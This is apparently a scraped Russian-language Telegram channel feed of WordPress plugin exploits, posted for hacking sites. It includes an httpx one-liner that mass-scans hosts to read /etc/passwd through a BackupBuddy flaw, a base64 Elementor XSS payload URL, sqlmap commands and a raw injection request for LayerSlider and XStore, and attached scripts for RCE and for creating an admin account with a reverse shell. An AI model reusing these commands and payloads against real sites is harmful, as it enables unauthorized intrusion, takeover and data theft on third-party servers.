Коллекция
(шеллы, бэкдоры, хаки, вирусы и тд)
PEW
#malware #wordpress
малвари найденная на скомпрометированных wordpress сайтах. (шеллы, бэкдоры, хаки, вирусы и тд)
PEW
#malware #wordpress
👍3😱1
Wordpress vuln\CVE
plugin: BackupBuddy
*
Уже неделю активно используется для похека wordpress хостов
#wordpress #cve
plugin: BackupBuddy
*
cat hosts |httpx -title -path "/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd" -match-string "root:x:0:0"*
Уже неделю активно используется для похека wordpress хостов
#wordpress #cve
🔥8👍5
Wordpress - XSS ( CVE-2022-29455)
/wp-content/plugins/elementor/assets/js/frontend.min.js
usage:
/wp-content/plugins/elementor/assets/js/frontend.min.js
usage:
https://target_site/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg==
#wordpress #xss👍17🔥7
CVE-2023-32243
wordpress
Essential Addons for Elementor 5.4.0-5.7.1 - Unauthenticated Privilege Escalation
exploit
#wordpress #plugin
wordpress
Essential Addons for Elementor 5.4.0-5.7.1 - Unauthenticated Privilege Escalation
exploit
#wordpress #plugin
👍4🔥4
CVE-2023-6553 Exploit
Плагин
*
exploit
#wordpress #rce
Плагин
Backup Migration для WordPress , RCE до версии 1.3.7 включительно *
exploit
#wordpress #rce
🔥16
exploit.py
6.2 KB
CVE-2024-25600 wordpress Exploit (RCE)
*
Дыра в плагине
*
requirements:
*
#RCE #wordpress
*
Дыра в плагине
Bricks Builder*
requirements:
alive_progress
bs4
prompt_toolkit
requests
rich*
#RCE #wordpress
🔥21👍4👌3
CVE-2024-2879 LayerSlider плагин для WordPress
*
Версии LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection
*
Недостаточне экранирование позволяет добавлять дополнительные SQL-запросы к уже существующим, как итог = можно использовать для извлечения конфиденциальной информации из базы данных.
*
POC usage:
#wordpress
*
Версии LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection
*
Недостаточне экранирование позволяет добавлять дополнительные SQL-запросы к уже существующим, как итог = можно использовать для извлечения конфиденциальной информации из базы данных.
*
POC usage:
sqlmap "https:://OLOLO.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T or sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T#wordpress
🔥20
WordPress_Auto_Admin_Account_and_Reverse_Shell_cve_2024_27956.zip
3 KB
cve-2024-27956
*
WordPress Auto Admin Account Creation and Reverse Shell.
*
Дырка в плагине wp-automatic для выполнения SQL-запросов.
#wordpress
*
WordPress Auto Admin Account Creation and Reverse Shell.
*
Дырка в плагине wp-automatic для выполнения SQL-запросов.
#wordpress
🔥16👍7
CVE-2024-33551
Уязвимость
Уязвимость позволяет команды SQL в базе данных.
*
POC
#wordpress #sql
Уязвимость
SQL inj, обнаруженная в 8theme XStore, платформе электронной коммерции, созданной на базе WordPress. Уязвимость позволяет команды SQL в базе данных.
*
POC
POST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Upgrade-Insecure-Requests: 1#wordpress #sql
🔥25
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2024-5326 WordPress
*
Post Grid Gutenberg и плагин PostX = 4.1.2
User Contributor включает регистрацию новых пользователей и устанавливает роль по умолчанию для новых пользователей — Администратор.
*
POC exploit
#wordpress #exploit
*
Post Grid Gutenberg и плагин PostX = 4.1.2
User Contributor включает регистрацию новых пользователей и устанавливает роль по умолчанию для новых пользователей — Администратор.
*
POC exploit
#wordpress #exploit
🔥26👍3